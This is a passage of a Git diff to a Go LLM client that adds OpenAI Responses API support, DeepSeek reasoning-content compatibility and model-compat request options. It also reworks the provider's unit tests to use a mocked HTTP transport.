+	if model != nil && model.Compat != nil && model.Compat.SupportsReasoningEffort != nil {
+		return *model.Compat.SupportsReasoningEffort
+	}
+	return true
+}
+
+func maxTokensField(model *provider.Model) string {
+	if model != nil && model.Compat != nil {
+		return model.Compat.MaxTokensField
+	}
+	return ""
+}
+
+func (p *Provider) requiresReasoningContentOnAssistant(model *provider.Model) bool {
+	if model != nil && model.Compat != nil && model.Compat.RequiresReasoningContentOnAssistant {
+		return true
+	}
+	lowerBaseURL := strings.ToLower(p.baseURL)
+	return strings.Contains(lowerBaseURL, "deepseek") || strings.Contains(lowerBaseURL, "xiaomimimo")
+}
+
+func (p *Provider) convertMessages(params provider.ChatParams, forceAssistantReasoning bool) []openAIMessage {
 	var messages []openAIMessage
 
 	// Add system prompt as the first message if provided
@@ -482,7 +661,7 @@ func (p *Provider) convertMessages(params provider.ChatParams) []openAIMessage {
 			// For assistant messages with tool calls, ensure content is not an empty array
 			// Set reasoning content if available
 			if reasoningContent != "" {
-				om.Reasoning = reasoningContent
+				om.Reasoning = &reasoningContent
 			}
 		} else {
 			om.Content = msg.Content
@@ -497,6 +676,10 @@ func (p *Provider) convertMessages(params provider.ChatParams) []openAIMessage {
 				}
 			}
 		}
+		if msg.Role == "assistant" && forceAssistantReasoning && om.Reasoning == nil {
+			reasoningContent := ""
+			om.Reasoning = &reasoningContent
+		}
 		messages = append(messages, om)
 	}
 	return messages
@@ -505,6 +688,9 @@ func (p *Provider) convertMessages(params provider.ChatParams) []openAIMessage {
 func (p *Provider) convertTools(tools []provider.ToolDefinition) []openAITool {
 	var result []openAITool
 	for _, t := range tools {
+		if t.Kind == "hosted" {
+			continue
+		}
 		result = append(result, openAITool{Type: "function", Function: openAIFunction{Name: t.Name, Description: t.Description, Parameters: t.Parameters}})
 	}
 	return result
diff --git a/internal/provider/openai/provider_test.go b/internal/provider/openai/provider_test.go
index 8ac567d..0c43ef6 100644
--- a/internal/provider/openai/provider_test.go
+++ b/internal/provider/openai/provider_test.go
@@ -1,34 +1,23 @@
 package openai
 
 import (
+	"bytes"
 	"context"
+	"encoding/json"
+	"io"
 	"net/http"
-	"net/http/httptest"
+	"net/url"
+	"strings"
 	"testing"
 
+	"github.com/startvibecoding/vibecoding/internal/config"
 	"github.com/startvibecoding/vibecoding/internal/provider"
 )
 
 // ─── helpers ─────────────────────────────────────────────────────────────────
 
-func newTestServer(t *testing.T, sse string) *httptest.Server {
+func chatAndCollect(t *testing.T, p *Provider, params provider.ChatParams) []provider.StreamEvent {
 	t.Helper()
-	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
-		w.Header().Set("Content-Type", "text/event-stream")
-		w.WriteHeader(http.StatusOK)
-		_, _ = w.Write([]byte(sse))
-	}))
-	t.Cleanup(srv.Close)
-	return srv
-}
-
-func chatAndCollect(t *testing.T, srv *httptest.Server) []provider.StreamEvent {
-	t.Helper()
-	p := NewProvider("fake-key", srv.URL)
-	params := provider.ChatParams{
-		Messages: []provider.Message{provider.NewUserMessage("hi")},
-		Abort:    make(chan struct{}),
-	}
 	var events []provider.StreamEvent
 	for e := range p.Chat(context.Background(), params) {
 		events = append(events, e)
@@ -47,6 +36,434 @@ func mustUsage(t *testing.T, events []provider.StreamEvent) *provider.Usage {
 	return nil
 }
 
+type roundTripFunc func(*http.Request) (*http.Response, error)
+
+func (f roundTripFunc) RoundTrip(r *http.Request) (*http.Response, error) {
+	return f(r)
+}
+
+func newMockOpenAIProvider(t *testing.T, models []*provider.Model, sse string, bodyCh chan<- string, check func(*http.Request)) *Provider {
+	t.Helper()
+	p := NewProviderWithModels("fake-key", "https://api.test/v1", models)
+	p.client = &http.Client{Transport: roundTripFunc(func(r *http.Request) (*http.Response, error) {
+		if check != nil {
+			check(r)
+		}
+		if bodyCh != nil {
+			body, err := io.ReadAll(r.Body)
+			if err != nil {
+				return nil, err
+			}
+			bodyCh <- string(body)
+		}
+		return &http.Response{
+			StatusCode: http.StatusOK,
+			Header:     make(http.Header),
+			Body:       io.NopCloser(bytes.NewBufferString(sse)),
+			Request:    r,
+		}, nil
+	})}
+	return p
+}
+
+func TestOpenAIProviderHTTPProxy(t *testing.T) {
+	p, err := NewProviderWithModelsAndProxy("fake-key", "https://api.test/v1", "http://127.0.0.1:7890", []*provider.Model{{ID: "m1"}})
+	if err != nil {
+		t.Fatalf("provider with proxy: %v", err)
+	}
+	transport, ok := p.client.Transport.(*http.Transport)
+	if !ok {
+		t.Fatalf("transport = %T, want *http.Transport", p.client.Transport)
+	}
+	proxyURL, err := transport.Proxy(&http.Request{URL: &url.URL{Scheme: "https", Host: "api.test"}})
+	if err != nil {
+		t.Fatalf("proxy lookup: %v", err)
+	}
+	if proxyURL == nil || proxyURL.String() != "http://127.0.0.1:7890" {
+		t.Fatalf("proxy = %v, want http://127.0.0.1:7890", proxyURL)
+	}
+}
+
+func TestOpenAIThinkingFormatDeepSeekAutoDetect(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := newMockOpenAIProvider(t, []*provider.Model{
+		{ID: "deepseek-test", Reasoning: true},
+	}, "data: [DONE]\n", bodyCh, nil)
+	p.baseURL = p.baseURL + "/deepseek"
+	params := provider.ChatParams{
+		ModelID:       "deepseek-test",
+		Messages:      []provider.Message{provider.NewUserMessage("hi")},
+		ThinkingLevel: provider.ThinkingXHigh,
+		Abort:         make(chan struct{}),
+	}
+	for range p.Chat(context.Background(), params) {
+	}
+
+	var req openAIRequest
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &req); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+
+	if req.Thinking == nil || req.Thinking.Type != "enabled" {
+		t.Fatalf("thinking = %#v, want enabled", req.Thinking)
+	}
+	if req.ReasoningEffort != "max" {
+		t.Fatalf("reasoning_effort = %q, want max", req.ReasoningEffort)
+	}
+}
+
+func TestOpenAIThinkingFormatFromModelCompat(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := newMockOpenAIProvider(t, []*provider.Model{
+		{ID: "compat-test", Reasoning: true, Compat: &provider.ModelCompat{ThinkingFormat: "deepseek"}},
+	}, "data: [DONE]\n", bodyCh, nil)
+	params := provider.ChatParams{
+		ModelID:       "compat-test",
+		Messages:      []provider.Message{provider.NewUserMessage("hi")},
+		ThinkingLevel: provider.ThinkingHigh,
+		Abort:         make(chan struct{}),
+	}
+	for range p.Chat(context.Background(), params) {
+	}
+
+	var req openAIRequest
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &req); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+	if req.Thinking == nil || req.Thinking.Type != "enabled" {
+		t.Fatalf("thinking = %#v, want enabled", req.Thinking)
+	}
+	if req.ReasoningEffort != "high" {
+		t.Fatalf("reasoning_effort = %q, want high", req.ReasoningEffort)
+	}
+}
+
+func TestOpenAIModelCompatRequestFields(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	supportsReasoningEffort := false
+	p := newMockOpenAIProvider(t, []*provider.Model{
+		{
+			ID:        "compat-fields",
+			Reasoning: true,
+			Compat: &provider.ModelCompat{
+				MaxTokensField:          "max_completion_tokens",
+				SupportsReasoningEffort: &supportsReasoningEffort,
+			},
+		},
+	}, "data: [DONE]\n", bodyCh, nil)
+	params := provider.ChatParams{
+		ModelID:       "compat-fields",
+		Messages:      []provider.Message{provider.NewUserMessage("hi")},
+		ThinkingLevel: provider.ThinkingHigh,
+		MaxTokens:     1234,
+		Abort:         make(chan struct{}),
+	}
+	for range p.Chat(context.Background(), params) {
+	}
+
+	var raw map[string]any
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &raw); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+	if _, ok := raw["max_tokens"]; ok {
+		t.Fatalf("max_tokens present, want max_completion_tokens only: %#v", raw)
+	}
+	if got := raw["max_completion_tokens"]; got != float64(1234) {
+		t.Fatalf("max_completion_tokens = %#v, want 1234", got)
+	}
+	if _, ok := raw["reasoning_effort"]; ok {
+		t.Fatalf("reasoning_effort present despite compat flag: %#v", raw)
+	}
+}
+
+func TestOpenAIRequiresReasoningContentOnAssistant(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := newMockOpenAIProvider(t, []*provider.Model{
+		{
+			ID: "compat-reasoning",
+			Compat: &provider.ModelCompat{
+				RequiresReasoningContentOnAssistant: true,
+			},
+		},
+	}, "data: [DONE]\n", bodyCh, nil)
+	params := provider.ChatParams{
+		ModelID: "compat-reasoning",
+		Messages: []provider.Message{
+			provider.NewAssistantMessage([]provider.ContentBlock{
+				{Type: "text", Text: "previous answer"},
+			}),
+			provider.NewUserMessage("continue"),
+		},
+		Abort: make(chan struct{}),
+	}
+	for range p.Chat(context.Background(), params) {
+	}
+
+	var raw map[string]any
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &raw); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+	messages, ok := raw["messages"].([]any)
+	if !ok || len(messages) == 0 {
+		t.Fatalf("messages = %#v, want non-empty array", raw["messages"])
+	}
+	assistant, ok := messages[0].(map[string]any)
+	if !ok {
+		t.Fatalf("first message = %#v, want object", messages[0])
+	}
+	value, ok := assistant["reasoning_content"]
+	if !ok {
+		t.Fatalf("reasoning_content missing from assistant message: %#v", assistant)
+	}
+	if value != "" {
+		t.Fatalf("reasoning_content = %#v, want empty string", value)
+	}
+}
+
+func TestOpenAIResponsesAPIRequest(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := newMockOpenAIProvider(t, []*provider.Model{
+		{ID: "responses-test", Reasoning: true},
+	}, "data: [DONE]\n", bodyCh, func(r *http.Request) {
+		if r.URL.Path != "/v1/responses" {
+			t.Fatalf("path = %q, want /v1/responses", r.URL.Path)
+		}
+	})
+	p.SetUseResponsesAPI(true)
+
+	params := provider.ChatParams{
+		ModelID:       "responses-test",
+		SystemPrompt:  "You are a helper.",
+		Messages:      []provider.Message{provider.NewUserMessage("hi")},
+		ThinkingLevel: provider.ThinkingXHigh,
+		Abort:         make(chan struct{}),
+	}
+	for range p.Chat(context.Background(), params) {
+	}
+
+	var raw map[string]any
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &raw); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+	if raw["model"] != "responses-test" {
+		t.Fatalf("model = %#v, want responses-test", raw["model"])
+	}
+	if raw["instructions"] != "You are a helper." {
+		t.Fatalf("instructions = %#v, want system prompt", raw["instructions"])
+	}
+	if raw["stream"] != true {
+		t.Fatalf("stream = %#v, want true", raw["stream"])
+	}
+	if _, ok := raw["max_output_tokens"]; !ok {
+		t.Fatalf("max_output_tokens missing: %#v", raw)
+	}
+	if _, ok := raw["input"].([]any); !ok {
+		t.Fatalf("input = %#v, want array", raw["input"])
+	}
+	if _, ok := raw["reasoning"].(map[string]any); !ok {
+		t.Fatalf("reasoning = %#v, want object", raw["reasoning"])
+	}
+	reasoning := raw["reasoning"].(map[string]any)
+	if reasoning["effort"] != "high" {
+		t.Fatalf("reasoning.effort = %#v, want high", reasoning["effort"])
+	}
+	if reasoning["summary"] != "auto" {
+		t.Fatalf("reasoning.summary = %#v, want auto", reasoning["summary"])
+	}
+	if raw["prompt_cache_key"] == "" {
+		t.Fatalf("prompt_cache_key missing: %#v", raw)
+	}
+}
+
+func TestOpenAIResponsesAPIConfigOverrides(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := newMockOpenAIProvider(t, []*provider.Model{
+		{ID: "responses-test", Reasoning: true},
+	}, "data: [DONE]\n", bodyCh, nil)
+	p.SetUseResponsesAPI(true)
+	p.SetResponsesConfig(config.ResponsesConfig{
+		ReasoningSummary:     "concise",
+		PromptCacheKey:       "custom-cache-key",
+		PromptCacheRetention: "24h",
+	})
+
+	params := provider.ChatParams{
+		ModelID:       "responses-test",
+		Messages:      []provider.Message{provider.NewUserMessage("hi")},
+		ThinkingLevel: provider.ThinkingMinimal,
+		Abort:         make(chan struct{}),
+	}
+	for range p.Chat(context.Background(), params) {
+	}
+
+	var raw map[string]any
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &raw); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+	reasoning, ok := raw["reasoning"].(map[string]any)
+	if !ok {
+		t.Fatalf("reasoning = %#v, want object", raw["reasoning"])
+	}
+	if reasoning["effort"] != "minimal" {
+		t.Fatalf("reasoning.effort = %#v, want minimal", reasoning["effort"])
+	}
+	if reasoning["summary"] != "concise" {
+		t.Fatalf("reasoning.summary = %#v, want concise", reasoning["summary"])
+	}
+	if raw["prompt_cache_key"] != "custom-cache-key" {
+		t.Fatalf("prompt_cache_key = %#v, want custom-cache-key", raw["prompt_cache_key"])
+	}
+	if raw["prompt_cache_retention"] != "24h" {
+		t.Fatalf("prompt_cache_retention = %#v, want 24h", raw["prompt_cache_retention"])
+	}
+}
+
+func TestOpenAIResponsesAPIHostedWebSearchTool(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "responses-test"}}, "data: [DONE]\n", bodyCh, nil)
+	p.SetUseResponsesAPI(true)
+
+	params := provider.ChatParams{
+		ModelID:  "responses-test",
+		Messages: []provider.Message{provider.NewUserMessage("latest news?")},
+		Tools: []provider.ToolDefinition{
+			{Name: "web_search", Kind: "hosted", Provider: "gpt", ProviderType: "responses"},
+		},
+		Abort: make(chan struct{}),
+	}
+	for range p.Chat(context.Background(), params) {
+	}
+
+	var raw map[string]any
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &raw); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+	tools, ok := raw["tools"].([]any)
+	if !ok || len(tools) != 1 {
+		t.Fatalf("tools = %#v, want one hosted tool", raw["tools"])
+	}
+	tool, ok := tools[0].(map[string]any)
+	if !ok {
+		t.Fatalf("tool = %#v, want object", tools[0])
+	}
+	if tool["type"] != "web_search" {
+		t.Fatalf("tool.type = %#v, want web_search", tool["type"])
+	}
+	if _, ok := tool["name"]; ok {
+		t.Fatalf("hosted web search should not include function name: %#v", tool)
+	}
+}
+
+func TestOpenAIResponsesAPIStreamToolCall(t *testing.T) {
+	lines := []string{
+		`{"type":"response.output_text.delta","delta":"Working"}`,
+		`{"type":"response.function_call_arguments.delta","item_id":"call_1","delta":"{\"command\":"}`,
+		`{"type":"response.function_call_arguments.delta","item_id":"call_1","delta":"\"echo hi\"}"}`,
+		`{"type":"response.output_item.done","item":{"id":"call_1","type":"function_call","call_id":"call_1","name":"bash"}}`,
+		`{"type":"response.completed","response":{"status":"completed","usage":{"input_tokens":100,"output_tokens":5,"total_tokens":105,"input_tokens_details":{"cached_tokens":75},"output_tokens_details":{"reasoning_tokens":3}}}}`,
+	}
+	var b strings.Builder
+	for _, line := range lines {
+		b.WriteString("data: ")
+		b.WriteString(line)
+		b.WriteByte('\n')
+	}
+	b.WriteString("data: [DONE]\n")
+
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "mock", Reasoning: true}}, b.String(), nil, nil)
+	p.SetUseResponsesAPI(true)
+
+	params := provider.ChatParams{
+		Messages: []provider.Message{provider.NewUserMessage("hi")},
+		Abort:    make(chan struct{}),
+	}
+	var events []provider.StreamEvent
+	for e := range p.Chat(context.Background(), params) {
+		events = append(events, e)
+	}
+	if len(events) == 0 {
+		t.Fatal("no events returned")
+	}
+
+	var (
+		gotText  string
+		gotTool  *provider.ToolCallBlock
+		gotUsage *provider.Usage
+		gotDone  bool
+	)
+	for _, e := range events {
+		switch e.Type {
+		case provider.StreamTextDelta:
+			gotText += e.TextDelta
+		case provider.StreamToolCall:
+			gotTool = e.ToolCall
+		case provider.StreamUsage:
+			gotUsage = e.Usage
+		case provider.StreamDone:
+			gotDone = true
+		}
+	}
+	if gotText != "Working" {
+		t.Fatalf("text = %q, want Working", gotText)
+	}
+	if gotTool == nil {
+		t.Fatal("missing StreamToolCall event")
+	}
+	if gotTool.ID != "call_1" {
+		t.Fatalf("tool ID = %q, want call_1", gotTool.ID)
+	}
+	if gotTool.Name != "bash" {
+		t.Fatalf("tool name = %q, want bash", gotTool.Name)
+	}
+	if string(gotTool.Arguments) != "{\"command\":\"echo hi\"}" {
+		t.Fatalf("tool args = %q, want %q", string(gotTool.Arguments), "{\"command\":\"echo hi\"}")
+	}
+	if gotUsage == nil || gotUsage.CacheRead != 75 {
+		t.Fatalf("usage = %#v, want cacheRead 75", gotUsage)
+	}
+	if gotUsage.Reasoning != 3 {
+		t.Fatalf("usage reasoning = %d, want 3", gotUsage.Reasoning)
+	}
+	if !gotDone {
+		t.Fatal("missing StreamDone event")
+	}
+}
+
 // ─── standard OpenAI SSE scenarios ───────────────────────────────────────────
 
 // TestOpenAICache_CacheHit: final SSE chunk carries full usage with cached tokens.
@@ -56,8 +473,8 @@ func TestOpenAICache_CacheHit(t *testing.T) {
 		"data: {\"id\":\"chatcmpl-1\",\"object\":\"chat.completion.chunk\",\"choices\":[{\"index\":0,\"delta\":{},\"finish_reason\":\"stop\"}],\"usage\":{\"prompt_tokens\":1000,\"completion_tokens\":5,\"total_tokens\":1005,\"prompt_tokens_details\":{\"cached_tokens\":750}}}\n" +
 		"data: [DONE]\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	if u.Input != 1000 {
 		t.Errorf("Input = %d, want 1000", u.Input)
@@ -79,8 +496,8 @@ func TestOpenAICache_NoCache(t *testing.T) {
 		"data: {\"id\":\"chatcmpl-2\",\"object\":\"chat.completion.chunk\",\"choices\":[{\"index\":0,\"delta\":{},\"finish_reason\":\"stop\"}],\"usage\":{\"prompt_tokens\":200,\"completion_tokens\":8,\"total_tokens\":208}}\n" +
 		"data: [DONE]\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	if u.Input != 200 {
 		t.Errorf("Input = %d, want 200", u.Input)
@@ -99,8 +516,8 @@ func TestOpenAICache_100Pct(t *testing.T) {
 		"data: {\"id\":\"chatcmpl-3\",\"object\":\"chat.completion.chunk\",\"choices\":[{\"index\":0,\"delta\":{},\"finish_reason\":\"stop\"}],\"usage\":{\"prompt_tokens\":500,\"completion_tokens\":4,\"total_tokens\":504,\"prompt_tokens_details\":{\"cached_tokens\":500}}}\n" +
 		"data: [DONE]\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	if u.CacheRead != 500 {
 		t.Errorf("CacheRead = %d, want 500", u.CacheRead)
@@ -119,8 +536,8 @@ func TestOpenAICache_ProxyFirstChunkHasUsage(t *testing.T) {
 		"data: {\"id\":\"chatcmpl-4\",\"object\":\"chat.completion.chunk\",\"choices\":[{\"index\":0,\"delta\":{},\"finish_reason\":\"stop\"}]}\n" +
 		"data: [DONE]\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	if u.Input != 800 {
 		t.Errorf("Input = %d, want 800", u.Input)
@@ -141,8 +558,8 @@ func TestOpenAICache_ProxyFirstWinsOnConflict(t *testing.T) {
 		"data: {\"id\":\"chatcmpl-5\",\"object\":\"chat.completion.chunk\",\"choices\":[{\"index\":0,\"delta\":{},\"finish_reason\":\"stop\"}],\"usage\":{\"prompt_tokens\":999,\"completion_tokens\":99,\"total_tokens\":1098,\"prompt_tokens_details\":{\"cached_tokens\":800}}}\n" +
 		"data: [DONE]\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	if u.Input != 1000 {
 		t.Errorf("Input = %d, want 1000 (first chunk wins)", u.Input)
@@ -168,8 +585,8 @@ func TestOpenAICache_ProxySplitUsage(t *testing.T) {
 		"data: {\"id\":\"chatcmpl-6\",\"object\":\"chat.completion.chunk\",\"choices\":[{\"index\":0,\"delta\":{},\"finish_reason\":\"stop\"}],\"usage\":{\"prompt_tokens\":0,\"completion_tokens\":0,\"total_tokens\":0,\"prompt_tokens_details\":{\"cached_tokens\":300}}}\n" +
 		"data: [DONE]\n"
 
-	srv := newTestServer(t, sse)
-	u := mustUsage(t, chatAndCollect(t, srv))
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	u := mustUsage(t, chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})}))
 
 	if u.Input != 400 {
 		t.Errorf("Input = %d, want 400 (first chunk)", u.Input)
@@ -192,7 +609,8 @@ func TestOpenAIToolCall_MissingIDGetsFallback(t *testing.T) {
 		"data: {\"id\":\"chatcmpl-tool-1\",\"object\":\"chat.completion.chunk\",\"choices\":[{\"index\":0,\"delta\":{},\"finish_reason\":\"tool_calls\"}]}\n" +
 		"data: [DONE]\n"
 
-	events := chatAndCollect(t, newTestServer(t, sse))
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	events := chatAndCollect(t, p, provider.ChatParams{Messages: []provider.Message{provider.NewUserMessage("hi")}, Abort: make(chan struct{})})
 
 	var got *provider.ToolCallBlock
 	for _, e := range events {
@@ -214,3 +632,157 @@ func TestOpenAIToolCall_MissingIDGetsFallback(t *testing.T) {
 		t.Fatalf("ToolCall.Arguments = %q, want %q", string(got.Arguments), "{\"command\":\"echo hi\"}")
 	}
 }
+
+func TestOpenAIResponsesAPICompatDisablesOptionalParams(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	no := false
+	p := newMockOpenAIProvider(t, []*provider.Model{{
+		ID:        "responses-test",
+		Reasoning: true,
+		Compat: &provider.ModelCompat{
+			SupportsPromptCacheKey:   &no,
+			SupportsReasoningSummary: &no,
+		},
+	}}, "data: [DONE]\n", bodyCh, nil)
+	p.SetUseResponsesAPI(true)
+
+	for range p.Chat(context.Background(), provider.ChatParams{
+		ModelID:       "responses-test",
+		Messages:      []provider.Message{provider.NewUserMessage("hi")},
+		ThinkingLevel: provider.ThinkingHigh,
+		Abort:         make(chan struct{}),
+	}) {
+	}
+
+	var raw map[string]any
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &raw); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+	if _, ok := raw["prompt_cache_key"]; ok {
+		t.Fatalf("prompt_cache_key present despite compat flag: %#v", raw)
+	}
+	reasoning, ok := raw["reasoning"].(map[string]any)
+	if !ok {
+		t.Fatalf("reasoning = %#v, want object", raw["reasoning"])
+	}
+	if _, ok := reasoning["summary"]; ok {
+		t.Fatalf("reasoning.summary present despite compat flag: %#v", reasoning)
+	}
+}
+
+func TestOpenAIResponsesAPILongCacheRetentionCompat(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	no := false
+	p := newMockOpenAIProvider(t, []*provider.Model{{
+		ID: "responses-test",
+		Compat: &provider.ModelCompat{
+			SupportsLongCacheRetention: &no,
+		},
+	}}, "data: [DONE]\n", bodyCh, nil)
+	p.SetUseResponsesAPI(true)
+	p.SetResponsesConfig(config.ResponsesConfig{PromptCacheRetention: "24h"})
+
+	for range p.Chat(context.Background(), provider.ChatParams{
+		ModelID:  "responses-test",
+		Messages: []provider.Message{provider.NewUserMessage("hi")},
+		Abort:    make(chan struct{}),
+	}) {
+	}
+
+	var raw map[string]any
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &raw); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+	if raw["prompt_cache_key"] == "" {
+		t.Fatalf("prompt_cache_key missing: %#v", raw)
+	}
+	if _, ok := raw["prompt_cache_retention"]; ok {
+		t.Fatalf("prompt_cache_retention present despite compat flag: %#v", raw)
+	}
+}
+
+func TestOpenAIResponsesAPIPromptCacheCanBeDisabled(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	no := false
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "responses-test", Reasoning: true}}, "data: [DONE]\n", bodyCh, nil)
+	p.SetUseResponsesAPI(true)
+	p.SetResponsesConfig(config.ResponsesConfig{PromptCacheEnabled: &no})
+
+	for range p.Chat(context.Background(), provider.ChatParams{
+		ModelID:       "responses-test",
+		Messages:      []provider.Message{provider.NewUserMessage("hi")},
+		ThinkingLevel: provider.ThinkingHigh,
+		Abort:         make(chan struct{}),
+	}) {
+	}
+
+	var raw map[string]any
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &raw); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+	if _, ok := raw["prompt_cache_key"]; ok {
+		t.Fatalf("prompt_cache_key present despite disabled cache: %#v", raw)
+	}
+}
+
+func TestOpenAIResponsesAPINoReasoningWhenOff(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "responses-test", Reasoning: true}}, "data: [DONE]\n", bodyCh, nil)
+	p.SetUseResponsesAPI(true)
+
+	for range p.Chat(context.Background(), provider.ChatParams{
+		ModelID:       "responses-test",
+		Messages:      []provider.Message{provider.NewUserMessage("hi")},
+		ThinkingLevel: provider.ThinkingOff,
+		Abort:         make(chan struct{}),
+	}) {
+	}
+
+	var raw map[string]any
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &raw); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+	if _, ok := raw["reasoning"]; ok {
+		t.Fatalf("reasoning present despite thinking off: %#v", raw)
+	}
+}
+
+func TestOpenAIResponsesAPIStreamFailure(t *testing.T) {
+	sse := "data: {\"type\":\"response.failed\",\"error\":{\"message\":\"bad request\"}}\n"
+	p := newMockOpenAIProvider(t, []*provider.Model{{ID: "mock"}}, sse, nil, nil)
+	p.SetUseResponsesAPI(true)
+
+	events := chatAndCollect(t, p, provider.ChatParams{
+		Messages: []provider.Message{provider.NewUserMessage("hi")},
+		Abort:    make(chan struct{}),
+	})
+	for _, e := range events {
+		if e.Type == provider.StreamError {
+			if e.Error == nil || !strings.Contains(e.Error.Error(), "bad request") {
+				t.Fatalf("error = %v, want bad request", e.Error)
+			}
+			return
+		}
+	}
+	t.Fatal("missing StreamError event")
+}
diff --git a/internal/provider/openai/responses.go b/internal/provider/openai/responses.go
new file mode 100644
index 0000000..2920f1d
--- /dev/null
+++ b/internal/provider/openai/responses.go
@@ -0,0 +1,526 @@
+package openai
+
+import (
+	"bufio"
+	"bytes"
+	"context"
+	"encoding/json"
+	"fmt"
+	"io"
+	"net/http"
+	"os"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/provider"
+	"github.com/startvibecoding/vibecoding/internal/ua"
+)
+
+// responsesRequest represents the request body for OpenAI Responses API.
+type responsesRequest struct {
+	Model                string               `json:"model"`
+	Instructions         string               `json:"instructions,omitempty"`
+	Input                []responsesInputItem `json:"input"`
+	Tools                []responsesTool      `json:"tools,omitempty"`
+	MaxOutputTokens      int                  `json:"max_output_tokens,omitempty"`
+	Temperature          *float64             `json:"temperature,omitempty"`
+	TopP                 *float64             `json:"top_p,omitempty"`
+	Stream               bool                 `json:"stream"`
+	Reasoning            *responsesReasoning  `json:"reasoning,omitempty"`
+	ParallelToolCalls    *bool                `json:"parallel_tool_calls,omitempty"`
+	PromptCacheKey       string               `json:"prompt_cache_key,omitempty"`
+	PromptCacheRetention string               `json:"prompt_cache_retention,omitempty"`
+}
+
+type responsesReasoning struct {
+	Effort  string `json:"effort,omitempty"`
+	Summary string `json:"summary,omitempty"`
+}
+
+type responsesInputItem struct {
+	Type      string      `json:"type,omitempty"`
+	Role      string      `json:"role,omitempty"`
